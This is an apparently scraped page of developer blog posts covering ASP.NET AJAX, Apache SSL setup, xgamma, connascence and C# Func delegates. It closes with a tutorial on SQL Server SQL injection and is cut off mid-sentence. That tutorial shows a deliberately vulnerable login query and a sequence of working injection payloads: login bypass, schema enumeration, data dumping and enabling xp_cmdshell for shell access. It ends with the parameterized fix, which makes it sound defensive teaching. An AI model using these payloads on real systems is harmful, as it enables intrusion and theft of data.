<asp:ScriptManager runat="server" ID="scriptManager"> <Services> <asp:ServiceReference Path="WebService.asmx" /> </Services> </asp:ScriptManager> .csharpcode, .csharpcode pre { font-size: small; color: black; font-family: consolas, "Courier New", courier, monospace; background-color: #ffffff; /*white-space: pre;*/ } .csharpcode pre { margin: 0em; } .csharpcode .rem { color: #008000; } .csharpcode .kwrd { color: #0000ff; } .csharpcode .str { color: #006080; } .csharpcode .op { color: #0000c0; } .csharpcode .preproc { color: #cc6633; } .csharpcode .asp { background-color: #ffff00; } .csharpcode .html { color: #800000; } .csharpcode .attr { color: #ff0000; } .csharpcode .alt { background-color: #f4f4f4; width: 100%; margin: 0em; } .csharpcode .lnum { color: #606060; } 6-Define the JavaScript code to call the Web Service : <script language="javascript" type="text/javascript"> // This function calls the Web service method // passing simple type parameters and the // callback function function CallWebMethod() { var User_Name = document.getElementById('<%=txtUserName.ClientID %>').value; WebService.CheckDuplicate(User_Name, OnSucceeded, OnError); } // This is the callback function invoked if the Web service // succeeded function OnSucceeded(result) { var rsltElement = document.getElementById("lblDuplicate"); if (result == 1) rsltElement.innerHTML = "This User Name is exist"; else rsltElement.innerHTML = ""; } function OnError(error) { // Display the error. alert("Service Error: " + error.get_message()); } </script> .csharpcode, .csharpcode pre { font-size: small; color: black; font-family: consolas, "Courier New", courier, monospace; background-color: #ffffff; /*white-space: pre;*/ } .csharpcode pre { margin: 0em; } .csharpcode .rem { color: #008000; } .csharpcode .kwrd { color: #0000ff; } .csharpcode .str { color: #006080; } .csharpcode .op { color: #0000c0; } .csharpcode .preproc { color: #cc6633; } .csharpcode .asp { background-color: #ffff00; } .csharpcode .html { color: #800000; } .csharpcode .attr { color: #ff0000; } .csharpcode .alt { background-color: #f4f4f4; width: 100%; margin: 0em; } .csharpcode .lnum { color: #606060; } This call references the WebService Class and CheckDuplicate Web Method defined in the service. It passes a User_Name value obtained from a textbox as well as a callback function named OnSucceeded that should be invoked when the asynchronous Web Service call returns. If the Web Service in different Namespace you can refer it before the class name this Main formula may help you : NameSpaceName.ClassName.WebMethdName(Parameters , Success callback function, Error callback function); Parameters: you can pass one or many parameters. Success callback function :handles returned data from the service . Error callback function :Any errors that occur when the Web Service is called will trigger in this function. Using Error Callback function is optional. Hope these steps help you to understand this approach.

Read the article
Preventing duplicate Data with ASP.NET AJAX

- by Yousef_Jadallah

Some times you need to prevent User names ,E-mail ID's or other values from being duplicated by a new user during Registration or any other cases,So I will add a simple approach to make the page more user-friendly. Instead the user filled all the Registration fields then press submit after that received a message as a result of PostBack that "THIS USERNAME IS EXIST", Ajax tidies this up by allowing asynchronous querying while the user is still completing the registration form. ASP.NET enables you to create Web services can be accessed from client script in Web pages by using AJAX technology to make Web service calls. Data is exchanged asynchronously between client and server, typically in JSON format. I’ve added an article to show you step by step how to use ASP.NET AJAX with Web Services , you can find it here . Lets go a head with the steps : 1-Create a new project , if you are using VS 2005 you have to create ASP.NET Ajax Enabled Web site. 2-Create your own Database which contain user table that have User_Name field. for Testing I’ve added SQL Server Database that come with Dot Net 2008: Then I’ve created tblUsers: This table and this structure just for our example, you can use your own table to implement this approach. 3-Add new Item to your project or website, Choose Web Service file, lets say WebService.cs .In this Web Service file import System.Data.SqlClient Namespace, Then Add your web method that contain string parameter which received the Username parameter from the Script , Finally don’t forget to qualified the Web Service Class with the ScriptServiceAttribute attribute ([System.Web.Script.Services.ScriptService]) using System; using System.Collections.Generic; using System.Linq; using System.Web; using System.Web.Services; using System.Data.SqlClient; [WebService(Namespace = "http://tempuri.org/")] [WebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1_1)] [System.Web.Script.Services.ScriptService] public class WebService : System.Web.Services.WebService { [WebMethod] public int CheckDuplicate(string User_Name) { string strConn = @"Data Source=.\SQLEXPRESS;AttachDbFilename=|DataDirectory|\TestDB.mdf;Integrated Security=True;User Instance=True"; string strQuery = "SELECT COUNT(*) FROM tblUsers WHERE User_Name = @User_Name"; SqlConnection con = new SqlConnection(strConn); SqlCommand cmd = new SqlCommand(strQuery, con); cmd.Parameters.Add("User_Name", User_Name); con.Open(); int RetVal= (int)cmd.ExecuteScalar(); con.Close(); return RetVal; } } .csharpcode, .csharpcode pre { font-size: small; color: black; font-family: consolas, "Courier New", courier, monospace; background-color: #ffffff; /*white-space: pre;*/ } .csharpcode pre { margin: 0em; } .csharpcode .rem { color: #008000; } .csharpcode .kwrd { color: #0000ff; } .csharpcode .str { color: #006080; } .csharpcode .op { color: #0000c0; } .csharpcode .preproc { color: #cc6633; } .csharpcode .asp { background-color: #ffff00; } .csharpcode .html { color: #800000; } .csharpcode .attr { color: #ff0000; } .csharpcode .alt { background-color: #f4f4f4; width: 100%; margin: 0em; } .csharpcode .lnum { color: #606060; } Our Web Method here is CheckDuplicate Which accept User_Name String as a parameter and return number of the rows , if the name will found in the database this method will return 1 else it will return 0. I’ve applied [WebMethod] Attribute to our method CheckDuplicate, And applied the ScriptService attribute to a Web Service class named WebService. 4-Add this simple Registration form : <fieldset> <table id="TblRegistratoin" cellpadding="0" cellspacing="0"> <tr> <td> User Name </td> <td> <asp:TextBox ID="txtUserName" onblur="CallWebMethod();" runat="server"></asp:TextBox> </td> <td> <asp:Label ID="lblDuplicate" runat="server" ForeColor="Red" Text=""></asp:Label> </td> </tr> <tr> <td colspan="3"> <asp:Button ID="btnRegistration" runat="server" Text="Registration" /> </td> </tr> </table> </fieldset> .csharpcode, .csharpcode pre { font-size: small; color: black; font-family: consolas, "Courier New", courier, monospace; background-color: #ffffff; /*white-space: pre;*/ } .csharpcode pre { margin: 0em; } .csharpcode .rem { color: #008000; } .csharpcode .kwrd { color: #0000ff; } .csharpcode .str { color: #006080; } .csharpcode .op { color: #0000c0; } .csharpcode .preproc { color: #cc6633; } .csharpcode .asp { background-color: #ffff00; } .csharpcode .html { color: #800000; } .csharpcode .attr { color: #ff0000; } .csharpcode .alt { background-color: #f4f4f4; width: 100%; margin: 0em; } .csharpcode .lnum { color: #606060; } onblur event is added to the Textbox txtUserName, This event Fires when the Textbox loses the input focus, That mean after the user get focus out from the Textbox CallWebMethod function will be fired. CallWebMethod will be implemented in step 6. 5-Add ScriptManager Control to your aspx file then reference the Web service by adding an asp:ServiceReference child element to the ScriptManager control and setting its path attribute to point to the Web service, That generate a JavaScript proxy class for calling the specified Web service from client script. <asp:ScriptManager runat="server" ID="scriptManager"> <Services> <asp:ServiceReference Path="WebService.asmx" /> </Services> </asp:ScriptManager> .csharpcode, .csharpcode pre { font-size: small; color: black; font-family: consolas, "Courier New", courier, monospace; background-color: #ffffff; /*white-space: pre;*/ } .csharpcode pre { margin: 0em; } .csharpcode .rem { color: #008000; } .csharpcode .kwrd { color: #0000ff; } .csharpcode .str { color: #006080; } .csharpcode .op { color: #0000c0; } .csharpcode .preproc { color: #cc6633; } .csharpcode .asp { background-color: #ffff00; } .csharpcode .html { color: #800000; } .csharpcode .attr { color: #ff0000; } .csharpcode .alt { background-color: #f4f4f4; width: 100%; margin: 0em; } .csharpcode .lnum { color: #606060; } 6-Define the JavaScript code to call the Web Service : <script language="javascript" type="text/javascript"> // This function calls the Web service method // passing simple type parameters and the // callback function function CallWebMethod() { var User_Name = document.getElementById('<%=txtUserName.ClientID %>').value; WebService.CheckDuplicate(User_Name, OnSucceeded, OnError); } // This is the callback function invoked if the Web service // succeeded function OnSucceeded(result) { var rsltElement = document.getElementById("lblDuplicate"); if (result == 1) rsltElement.innerHTML = "This User Name is exist"; else rsltElement.innerHTML = ""; } function OnError(error) { // Display the error. alert("Service Error: " + error.get_message()); } </script> .csharpcode, .csharpcode pre { font-size: small; color: black; font-family: consolas, "Courier New", courier, monospace; background-color: #ffffff; /*white-space: pre;*/ } .csharpcode pre { margin: 0em; } .csharpcode .rem { color: #008000; } .csharpcode .kwrd { color: #0000ff; } .csharpcode .str { color: #006080; } .csharpcode .op { color: #0000c0; } .csharpcode .preproc { color: #cc6633; } .csharpcode .asp { background-color: #ffff00; } .csharpcode .html { color: #800000; } .csharpcode .attr { color: #ff0000; } .csharpcode .alt { background-color: #f4f4f4; width: 100%; margin: 0em; } .csharpcode .lnum { color: #606060; } This call references the WebService Class and CheckDuplicate Web Method defined in the service. It passes a User_Name value obtained from a textbox as well as a callback function named OnSucceeded that should be invoked when the asynchronous Web Service call returns. If the Web Service in different Namespace you can refer it before the class name this Main formula may help you : NameSpaceName.ClassName.WebMethdName(Parameters , Success callback function, Error callback function); Parameters: you can pass one or many parameters. Success callback function :handles returned data from the service . Error callback function :Any errors that occur when the Web Service is called will trigger in this function. Using Error Callback function is optional. Hope these steps help you to understand this approach.

Read the article
Can't start httpd 2.4.9 with self-signed SSL certificate

- by Smollet

I cannot start the httpd 2.4.9 (tried 2.4.x too) on CentOS 6.5 with the simplest SSL config possible. The openssl version installed on the machine is OpenSSL 1.0.1e-fips 11 Feb 2013 (I've upgraded it using 'yum update' to the latest patched version as well) I have compiled and installed the httpd 2.4.9 using the following commands: ./configure --enable-ssl --with-ssl=/usr/local/ssl/ --enable-proxy=shared --enable-proxy_wstunnel=shared --with-apr=apr-1.5.1/ --with-apr-util=apr-util-1.5.3/ make make install Now I'm generating the default self-signed certificate as described in the CentOS HowTo: openssl genrsa -out ca.key 2048 openssl req -new -key ca.key -out ca.csr openssl x509 -req -days 365 -in ca.csr -signkey ca.key -out ca.crt cp ca.crt /etc/pki/tls/certs cp ca.key /etc/pki/tls/private/ca.key cp ca.csr /etc/pki/tls/private/ca.csr Here is my httpd-ssl.conf file: Listen 443 SSLCipherSuite HIGH:MEDIUM:!aNULL:!MD5 SSLPassPhraseDialog builtin SSLSessionCache "shmcb:/usr/local/apache2/logs/ssl_scache(512000)" SSLSessionCacheTimeout 300 <VirtualHost *:443> SSLEngine on SSLCertificateFile /etc/pki/tls/certs/ca.crt SSLCertificateKeyFile /etc/pki/tls/private/ca.key <FilesMatch "\.(cgi|shtml|phtml|php)$"> SSLOptions +StdEnvVars </FilesMatch> <Directory "/usr/local/apache2/cgi-bin"> SSLOptions +StdEnvVars </Directory> BrowserMatch "MSIE [2-5]" \ nokeepalive ssl-unclean-shutdown \ downgrade-1.0 force-response-1.0 CustomLog "/usr/local/apache2/logs/ssl_request_log" \ "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b" </VirtualHost> when I start httpd using bin/apachectl -k start I get following errors in the error_log: Wed Jun 04 00:29:27.995654 2014] [ssl:info] [pid 24021:tid 139640404293376] AH01887: Init: Initializing (virtual) servers for SSL [Wed Jun 04 00:29:27.995726 2014] [ssl:info] [pid 24021:tid 139640404293376] AH01914: Configuring server 192.168.9.128:443 for SSL protocol [Wed Jun 04 00:29:27.995863 2014] [ssl:debug] [pid 24021:tid 139640404293376] ssl_engine_init.c(312): AH01893: Configuring TLS extension handling [Wed Jun 04 00:29:27.996111 2014] [ssl:debug] [pid 24021:tid 139640404293376] ssl_util_ssl.c(343): AH02412: [192.168.9.128:443] Cert matches for name '192.168.9.128' [subject: CN=192.168.9.128,OU=XXX,O=XXXX,L=XXXX,ST=NRW,C=DE / issuer: CN=192.168.9.128,OU=XXX,O=XXXX,L=XXXX,ST=NRW,C=DE / serial: AF04AF31799B7695 / notbefore: Jun 3 22:26:45 2014 GMT / notafter: Jun 3 22:26:45 2015 GMT] [Wed Jun 04 00:29:27.996122 2014] [ssl:info] [pid 24021:tid 139640404293376] AH02568: Certificate and private key 192.168.9.128:443:0 configured from /etc/pki/tls/certs/ca.crt and /etc/pki/tls/private/ca.key [Wed Jun 04 00:29:27.996209 2014] [ssl:info] [pid 24021:tid 139640404293376] AH01914: Configuring server 192.168.9.128:443 for SSL protocol [Wed Jun 04 00:29:27.996280 2014] [ssl:debug] [pid 24021:tid 139640404293376] ssl_engine_init.c(312): AH01893: Configuring TLS extension handling [Wed Jun 04 00:29:27.996295 2014] [ssl:emerg] [pid 24021:tid 139640404293376] AH02572: Failed to configure at least one certificate and key for 192.168.9.128:443 [Wed Jun 04 00:29:27.996303 2014] [ssl:emerg] [pid 24021:tid 139640404293376] SSL Library Error: error:0906D06C:PEM routines:PEM_read_bio:no start line (Expecting: DH PARAMETERS) -- Bad file contents or format - or even just a forgotten SSLCertificateKeyFile? [Wed Jun 04 00:29:27.996308 2014] [ssl:emerg] [pid 24021:tid 139640404293376] SSL Library Error: error:0906D06C:PEM routines:PEM_read_bio:no start line (Expecting: EC PARAMETERS) -- Bad file contents or format - or even just a forgotten SSLCertificateKeyFile? [Wed Jun 04 00:29:27.996318 2014] [ssl:emerg] [pid 24021:tid 139640404293376] SSL Library Error: error:140A80B1:SSL routines:SSL_CTX_check_private_key:no certificate assigned [Wed Jun 04 00:29:27.996321 2014] [ssl:emerg] [pid 24021:tid 139640404293376] AH02312: Fatal error initialising mod_ssl, exiting. AH00016: Configuration Failed I then try to generate missing DH PARAMETERS and EC PARAMETERS: openssl dhparam -outform PEM -out dhparam.pem 2048 openssl ecparam -out ec_param.pem -name prime256v1 cat dhparam.pem ec_param.pem >> /etc/pki/tls/certs/ca.crt And it mitigates the error but the next comes out: [Wed Jun 04 00:34:05.021438 2014] [ssl:info] [pid 24089:tid 140719371077376] AH01887: Init: Initializing (virtual) servers for SSL [Wed Jun 04 00:34:05.021487 2014] [ssl:info] [pid 24089:tid 140719371077376] AH01914: Configuring server 192.168.9.128:443 for SSL protocol [Wed Jun 04 00:34:05.021874 2014] [ssl:debug] [pid 24089:tid 140719371077376] ssl_engine_init.c(312): AH01893: Configuring TLS extension handling [Wed Jun 04 00:34:05.022050 2014] [ssl:debug] [pid 24089:tid 140719371077376] ssl_util_ssl.c(343): AH02412: [192.168.9.128:443] Cert matches for name '192.168.9.128' [subject: CN=192.168.9.128,OU=XXX,O=XXXX,L=XXXX,ST=NRW,C=DE / issuer: CN=192.168.9.128,OU=XXX,O=XXXX,L=XXXX,ST=NRW,C=DE / serial: AF04AF31799B7695 / notbefore: Jun 3 22:26:45 2014 GMT / notafter: Jun 3 22:26:45 2015 GMT] [Wed Jun 04 00:34:05.022066 2014] [ssl:info] [pid 24089:tid 140719371077376] AH02568: Certificate and private key 192.168.9.128:443:0 configured from /etc/pki/tls/certs/ca.crt and /etc/pki/tls/private/ca.key [Wed Jun 04 00:34:05.022285 2014] [ssl:debug] [pid 24089:tid 140719371077376] ssl_engine_init.c(1016): AH02540: Custom DH parameters (2048 bits) for 192.168.9.128:443 loaded from /etc/pki/tls/certs/ca.crt [Wed Jun 04 00:34:05.022389 2014] [ssl:debug] [pid 24089:tid 140719371077376] ssl_engine_init.c(1030): AH02541: ECDH curve prime256v1 for 192.168.9.128:443 specified in /etc/pki/tls/certs/ca.crt [Wed Jun 04 00:34:05.022397 2014] [ssl:info] [pid 24089:tid 140719371077376] AH01914: Configuring server 192.168.9.128:443 for SSL protocol [Wed Jun 04 00:34:05.022464 2014] [ssl:debug] [pid 24089:tid 140719371077376] ssl_engine_init.c(312): AH01893: Configuring TLS extension handling [Wed Jun 04 00:34:05.022478 2014] [ssl:emerg] [pid 24089:tid 140719371077376] AH02572: Failed to configure at least one certificate and key for 192.168.9.128:443 [Wed Jun 04 00:34:05.022488 2014] [ssl:emerg] [pid 24089:tid 140719371077376] SSL Library Error: error:140A80B1:SSL routines:SSL_CTX_check_private_key:no certificate assigned [Wed Jun 04 00:34:05.022491 2014] [ssl:emerg] [pid 24089:tid 140719371077376] AH02312: Fatal error initialising mod_ssl, exiting. AH00016: Configuration Failed I have tried to generate the simple certificate/key pair exactly as described in the httpd docs Unfortunately, I still get exact same errors as above. I've seen a bug report with the similar issue: https://issues.apache.org/bugzilla/show_bug.cgi?id=56410 But the openssl version I have is reported as working there. I've also tried to apply the patch from the report as well as build the latest 2.4.x branch with no success, I get the same errors as above. I have also tried to create a short chain of certificates and set the root CA certificate using SSLCertificateChainFile directive. That didn't help either, I get exact same errors as above. I'm not interested in setting up hardened security, etc. The only thing I need is to start httpd with the simplest SSL config possible to continue testing proxy config for the mod_proxy_wstunnel Had anybody encountered and solved this issue? Is my sequence for creating a self-signed certificate incorrect? I'd appreciate any help very much!

Read the article
xgamma -display parameter for dual monitor setup

- by Shiplu

I want to change gamma for my first monitor. Every time I invoke xgamma with different -display parameters it somehow points to my second monitor. But I want to modify first one. I tried these commands. The parameters I have used for -display are :0, :0.0, :0.1, :1.0, :1.1, :1. Only the first 2 works. But it points to my second monitor. Not the first one. Here is a shell script to test it. shiplu@KubuntuD:~$ xgamma -display :0 -> Red 1.000, Green 1.000, Blue 1.000 shiplu@KubuntuD:~$ xgamma -display :0.0 -> Red 1.000, Green 1.000, Blue 1.000 shiplu@KubuntuD:~$ xgamma -display :0.1 xgamma: unable to open display ':0.1' shiplu@KubuntuD:~$ xgamma -display :1.0 xgamma: unable to open display ':1.0' shiplu@KubuntuD:~$ xgamma -display :1.1 xgamma: unable to open display ':1.1' shiplu@KubuntuD:~$ xgamma -display :1 xgamma: unable to open display ':1' How can I change the gamma for the first/primary monitor?

Read the article
Independence Day for Software Components – Loosening Coupling by Reducing Connascence

- by Brian Schroer

Today is Independence Day in the USA, which got me thinking about loosely-coupled “independent” software components. I was reminded of a video I bookmarked quite a while ago of Jim Weirich’s “Grand Unified Theory of Software Design” talk at MountainWest RubyConf 2009. I finally watched that video this morning. I highly recommend it. In the video, Jim talks about software connascence. The dictionary definition of connascence (con-NAY-sense) is: 1. The common birth of two or more at the same time 2. That which is born or produced with another. 3. The act of growing together. The brief Wikipedia page about Connascent Software Components says that: Two software components are connascent if a change in one would require the other to be modified in order to maintain the overall correctness of the system. Connascence is a way to characterize and reason about certain types of complexity in software systems. The term was introduced to the software world in Meilir Page-Jones’ 1996 book “What Every Programmer Should Know About Object-Oriented Design”. The middle third of that book is the author’s proposed graphical notation for describing OO designs. UML became the standard about a year later, so a revised version of the book was published in 1999 as “Fundamentals of Object-Oriented Design in UML”. Weirich says that the third part of the book, in which Page-Jones introduces the concept of connascence “is worth the price of the entire book”. (The price of the entire book, by the way, is not much – I just bought a used copy on Amazon for $1.36, so that was a pretty low-risk investment. I’m looking forward to getting the book and learning about connascence from the original source.) Meanwhile, here’s my summary of Weirich’s summary of Page-Jones writings about connascence: The stronger the form of connascence, the more difficult and costly it is to change the elements in the relationship. Some of the connascence types, ordered from weak to strong are: Connascence of Name Connascence of name is when multiple components must agree on the name of an entity. If you change the name of a method or property, then you need to change all references to that method or property. Duh. Connascence of name is unavoidable, assuming your objects are actually used. My main takeaway about connascence of name is that it emphasizes the importance of giving things good names so you don’t need to go changing them later. Connascence of Type Connascence of type is when multiple components must agree on the type of an entity. I assume this is more of a problem for languages without compilers (especially when used in apps without tests). I know it’s an issue with evil JavaScript type coercion. Connascence of Meaning Connascence of meaning is when multiple components must agree on the meaning of particular values, e.g that “1” means normal customer and “2” means preferred customer. The solution to this is to use constants or enums instead of “magic” strings or numbers, which reduces the coupling by changing the connascence form from “meaning” to “name”. Connascence of Position Connascence of positions is when multiple components must agree on the order of values. This refers to methods with multiple parameters, e.g.: eMailer.Send("[email protected]", "[email protected]", "Your order is complete", "Order completion notification"); The more parameters there are, the stronger the connascence of position is between the component and its callers. In the example above, it’s not immediately clear when reading the code which email addresses are sender and receiver, and which of the final two strings are subject vs. body. Connascence of position could be improved to connascence of type by replacing the parameter list with a struct or class. This “introduce parameter object” refactoring might be overkill for a method with 2 parameters, but would definitely be an improvement for a method with 10 parameters. This points out two “rules” of connascence: The Rule of Degree: The acceptability of connascence is related to the degree of its occurrence. The Rule of Locality: Stronger forms of connascence are more acceptable if the elements involved are closely related. For example, positional arguments in private methods are less problematic than in public methods. Connascence of Algorithm Connascence of algorithm is when multiple components must agree on a particular algorithm. Be DRY – Don’t Repeat Yourself. If you have “cloned” code in multiple locations, refactor it into a common function. Those are the “static” forms of connascence. There are also “dynamic” forms, including… Connascence of Execution Connascence of execution is when the order of execution of multiple components is important. Consumers of your class shouldn’t have to know that they have to call an .Initialize method before it’s safe to call a .DoSomething method. Connascence of Timing Connascence of timing is when the timing of the execution of multiple components is important. I’ll have to read up on this one when I get the book, but assume it’s largely about threading. Connascence of Identity Connascence of identity is when multiple components must reference the entity. The example Weirich gives is when you have two instances of the “Bob” Employee class and you call the .RaiseSalary method on one and then the .Pay method on the other does the payment use the updated salary? Again, this is my summary of a summary, so please be forgiving if I misunderstood anything. Once I get/read the book, I’ll make corrections if necessary and share any other useful information I might learn. See Also: Gregory Brown: Ruby Best Practices Issue #24: Connascence as a Software Design Metric (That link is failing at the time I write this, so I had to go to the Google cache of the page.)

Read the article
Func Delegate in C#

- by Jalpesh P. Vadgama

We already know about delegates in C# and I have previously posted about basics of delegates in C#. Following are posts about basic of delegates I have written. Delegates in C# Multicast Delegates in C# In this post we are going to learn about Func Delegates in C#. As per MSDN following is a definition. “Encapsulates a method that has one parameter and returns a value of the type specified by the TResult parameter.” Func can handle multiple arguments. The Func delegates is parameterized type. It takes any valid C# type as parameter and you have can multiple parameters and also you have specify the return type as last parameters. Followings are some examples of parameters. Func<int T,out TResult> Func<int T,int T, out Tresult> Now let’s take a string concatenation example for that. I am going to create two func delegate which will going to concate two strings and three string. Following is a code for that. using System; using System.Collections.Generic; namespace FuncExample { class Program { static void Main(string[] args) { Func<string, string, string> concatTwo = (x, y) => string.Format("{0} {1}",x,y); Func<string, string, string, string> concatThree = (x, y, z) => string.Format("{0} {1} {2}", x, y,z); Console.WriteLine(concatTwo("Hello", "Jalpesh")); Console.WriteLine(concatThree("Hello","Jalpesh","Vadgama")); Console.ReadLine(); } } } As you can see in above example, I have create two delegates ‘concatTwo’ and ‘concatThree. The first concat two strings and another concat three strings. If you see the func statements the last parameter is for the out as here its output string so I have written string as last parameter in both statements. Now it’s time to run the example and as expected following is output. That’s it. Hope you like it. Stay tuned for more updates.

Read the article
SQL Server SQL Injection from start to end

- by Mladen Prajdic

SQL injection is a method by which a hacker gains access to the database server by injecting specially formatted data through the user interface input fields. In the last few years we have witnessed a huge increase in the number of reported SQL injection attacks, many of which caused a great deal of damage. A SQL injection attack takes many guises, but the underlying method is always the same. The specially formatted data starts with an apostrophe (') to end the string column (usually username) check, continues with malicious SQL, and then ends with the SQL comment mark (--) in order to comment out the full original SQL that was intended to be submitted. The really advanced methods use binary or encoded text inputs instead of clear text. SQL injection vulnerabilities are often thought to be a database server problem. In reality they are a pure application design problem, generally resulting from unsafe techniques for dynamically constructing SQL statements that require user input. It also doesn't help that many web pages allow SQL Server error messages to be exposed to the user, having no input clean up or validation, allowing applications to connect with elevated (e.g. sa) privileges and so on. Usually that's caused by novice developers who just copy-and-paste code found on the internet without understanding the possible consequences. The first line of defense is to never let your applications connect via an admin account like sa. This account has full privileges on the server and so you virtually give the attacker open access to all your databases, servers, and network. The second line of defense is never to expose SQL Server error messages to the end user. Finally, always use safe methods for building dynamic SQL, using properly parameterized statements. Hopefully, all of this will be clearly demonstrated as we demonstrate two of the most common ways that enable SQL injection attacks, and how to remove the vulnerability. 1) Concatenating SQL statements on the client by hand 2) Using parameterized stored procedures but passing in parts of SQL statements As will become clear, SQL Injection vulnerabilities cannot be solved by simple database refactoring; often, both the application and database have to be redesigned to solve this problem. Concatenating SQL statements on the client This problem is caused when user-entered data is inserted into a dynamically-constructed SQL statement, by string concatenation, and then submitted for execution. Developers often think that some method of input sanitization is the solution to this problem, but the correct solution is to correctly parameterize the dynamic SQL. In this simple example, the code accepts a username and password and, if the user exists, returns the requested data. First the SQL code is shown that builds the table and test data then the C# code with the actual SQL Injection example from beginning to the end. The comments in code provide information on what actually happens. /* SQL CODE *//* Users table holds usernames and passwords and is the object of out hacking attempt */CREATE TABLE Users( UserId INT IDENTITY(1, 1) PRIMARY KEY , UserName VARCHAR(50) , UserPassword NVARCHAR(10))/* Insert 2 users */INSERT INTO Users(UserName, UserPassword)SELECT 'User 1', 'MyPwd' UNION ALLSELECT 'User 2', 'BlaBla' Vulnerable C# code, followed by a progressive SQL injection attack. /* .NET C# CODE *//*This method checks if a user exists. It uses SQL concatination on the client, which is susceptible to SQL injection attacks*/private bool DoesUserExist(string username, string password){ using (SqlConnection conn = new SqlConnection(@"server=YourServerName; database=tempdb; Integrated Security=SSPI;")) { /* This is the SQL string you usually see with novice developers. It returns a row if a user exists and no rows if it doesn't */ string sql = "SELECT * FROM Users WHERE UserName = '" + username + "' AND UserPassword = '" + password + "'"; SqlCommand cmd = conn.CreateCommand(); cmd.CommandText = sql; cmd.CommandType = CommandType.Text; cmd.Connection.Open(); DataSet dsResult = new DataSet(); /* If a user doesn't exist the cmd.ExecuteScalar() returns null; this is just to simplify the example; you can use other Execute methods too */ string userExists = (cmd.ExecuteScalar() ?? "0").ToString(); return userExists != "0"; } }}/*The SQL injection attack example. Username inputs should be run one after the other, to demonstrate the attack pattern.*/string username = "User 1";string password = "MyPwd";// See if we can even use SQL injection.// By simply using this we can log into the application username = "' OR 1=1 --";// What follows is a step-by-step guessing game designed // to find out column names used in the query, via the // error messages. By using GROUP BY we will get // the column names one by one.// First try the Idusername = "' GROUP BY Id HAVING 1=1--";// We get the SQL error: Invalid column name 'Id'.// From that we know that there's no column named Id. // Next up is UserIDusername = "' GROUP BY Users.UserId HAVING 1=1--";// AHA! here we get the error: Column 'Users.UserName' is // invalid in the SELECT list because it is not contained // in either an aggregate function or the GROUP BY clause.// We have guessed correctly that there is a column called // UserId and the error message has kindly informed us of // a table called Users with a column called UserName// Now we add UserName to our GROUP BYusername = "' GROUP BY Users.UserId, Users.UserName HAVING 1=1--";// We get the same error as before but with a new column // name, Users.UserPassword// Repeat this pattern till we have all column names that // are being return by the query.// Now we have to get the column data types. One non-string // data type is all we need to wreck havoc// Because 0 can be implicitly converted to any data type in SQL server we use it to fill up the UNION.// This can be done because we know the number of columns the query returns FROM our previous hacks.// Because SUM works for UserId we know it's an integer type. It doesn't matter which exactly.username = "' UNION SELECT SUM(Users.UserId), 0, 0 FROM Users--";// SUM() errors out for UserName and UserPassword columns giving us their data types:// Error: Operand data type varchar is invalid for SUM operator.username = "' UNION SELECT SUM(Users.UserName) FROM Users--";// Error: Operand data type nvarchar is invalid for SUM operator.username = "' UNION SELECT SUM(Users.UserPassword) FROM Users--";// Because we know the Users table structure we can insert our data into itusername = "'; INSERT INTO Users(UserName, UserPassword) SELECT 'Hacker user', 'Hacker pwd'; --";// Next let's get the actual data FROM the tables.// There are 2 ways you can do this.// The first is by using MIN on the varchar UserName column and // getting the data from error messages one by one like this:username = "' UNION SELECT min(UserName), 0, 0 FROM Users --";username = "' UNION SELECT min(UserName), 0, 0 FROM Users WHERE UserName > 'User 1'--";// we can repeat this method until we get all data one by one// The second method gives us all data at once and we can use it as soon as we find a non string columnusername = "' UNION SELECT (SELECT * FROM Users FOR XML RAW) as c1, 0, 0 --";// The error we get is: // Conversion failed when converting the nvarchar value // '<row UserId="1" UserName="User 1" UserPassword="MyPwd"/>// <row UserId="2" UserName="User 2" UserPassword="BlaBla"/>// <row UserId="3" UserName="Hacker user" UserPassword="Hacker pwd"/>' // to data type int.// We can see that the returned XML contains all table data including our injected user account.// By using the XML trick we can get any database or server info we wish as long as we have access// Some examples:// Get info for all databasesusername = "' UNION SELECT (SELECT name, dbid, convert(nvarchar(300), sid) as sid, cmptlevel, filename FROM master..sysdatabases FOR XML RAW) as c1, 0, 0 --";// Get info for all tables in master databaseusername = "' UNION SELECT (SELECT * FROM master.INFORMATION_SCHEMA.TABLES FOR XML RAW) as c1, 0, 0 --";// If that's not enough here's a way the attacker can gain shell access to your underlying windows server// This can be done by enabling and using the xp_cmdshell stored procedure// Enable xp_cmdshellusername = "'; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;";// Create a table to store the values returned by xp_cmdshellusername = "'; CREATE TABLE ShellHack (ShellData NVARCHAR(MAX))--";// list files in the current SQL Server directory with xp_cmdshell and store it in ShellHack table username = "'; INSERT INTO ShellHack EXEC xp_cmdshell \"dir\"--";// return the data via an error messageusername = "' UNION SELECT (SELECT * FROM ShellHack FOR XML RAW) as c1, 0, 0; --";// delete the table to get clean output (this step is optional)username = "'; DELETE ShellHack; --";// repeat the upper 3 statements to do other nasty stuff to the windows server// If the returned XML is larger than 8k you'll get the "String or binary data would be truncated." error// To avoid this chunk up the returned XML using paging techniques. // the username and password params come from the GUI textboxes.bool userExists = DoesUserExist(username, password ); Having demonstrated all of the information a hacker can get his hands on as a result of this single vulnerability, it's perhaps reassuring to know that the fix is very easy: use parameters, as show in the following example. /* The fixed C# method that doesn't suffer from SQL injection because it uses parameters.*/private bool DoesUserExist(string username, string password){ using (SqlConnection conn = new SqlConnection(@"server=baltazar\sql2k8; database=tempdb; Integrated Security=SSPI;")) { //This is the version of the SQL string that should be safe from SQL injection string sql = "SELECT * FROM Users WHERE UserName = @username AND UserPassword = @password"; SqlCommand cmd = conn.CreateCommand(); cmd.CommandText = sql; cmd.CommandType = CommandType.Text; // adding 2 SQL Parameters solves the SQL injection issue completely SqlParameter usernameParameter = new SqlParameter(); usernameParameter.ParameterName = "@username"; usernameParameter.DbType = DbType.String; usernameParameter.Value = username; cmd.Parameters.Add(usernameParameter); SqlParameter passwordParameter = new SqlParameter(); passwordParameter.ParameterName = "@password"; passwordParameter.DbType = DbType.String; passwordParameter.Value = password; cmd.Parameters.Add(passwordParameter); cmd.Connection.Open(); DataSet dsResult = new DataSet(); /* If a user doesn't exist the cmd.ExecuteScalar() returns null; this is just to simplify the example; you can use other Execute methods too */ string userExists = (cmd.ExecuteScalar() ?? "0").ToString(); return userExists == "1"; }} We have seen just how much danger we're in, if our code is vulnerable to SQL Injection. If you find code that contains such problems, then refactoring is not optional; it simply has to be done and no amount of deadline pressure should be a reason not to do it. Better yet, of course, never allow such vulnerabilities into your code in the first place. Your 